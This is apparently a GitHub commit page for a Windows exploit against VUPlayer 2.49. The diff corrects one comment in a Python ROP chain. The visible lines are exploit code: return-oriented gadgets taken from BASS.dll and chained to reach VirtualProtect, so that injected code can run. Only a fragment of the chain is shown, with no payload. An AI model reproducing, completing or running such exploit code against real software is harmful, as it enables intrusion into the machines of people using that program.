File tree Expand file tree Collapse file tree 1 file changed +1
-1
lines changed
VUPlayer_2.49_Windows_exploit Expand file tree Collapse file tree 1 file changed +1
-1
lines changed Original file line number Diff line number Diff line change @@ -13,7 +13,7 @@ def p32(x):
1313rop_chain += p32 (0x100106e1 ) # POP EBP # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
1414rop_chain += p32 (0x100106e1 ) # Clean ptr VirtualProtect from stack
1515rop_chain += p32 (0x10015f77 ) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
16- rop_chain += p32 (0xfffffd97 ) # -0x00000297 = 0xfffffd97 => EAX
16+ rop_chain += p32 (0xfffffd97 ) # -0x269 = 0xfffffd97 => EAX
1717rop_chain += p32 (0x10014db4 ) # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
1818rop_chain += p32 (0x10032f72 ) # XCHG EAX,EBX # RETN 0x00 ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
1919rop_chain += p32 (0x10015f77 ) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
You can’t perform that action at this time.
0 commit comments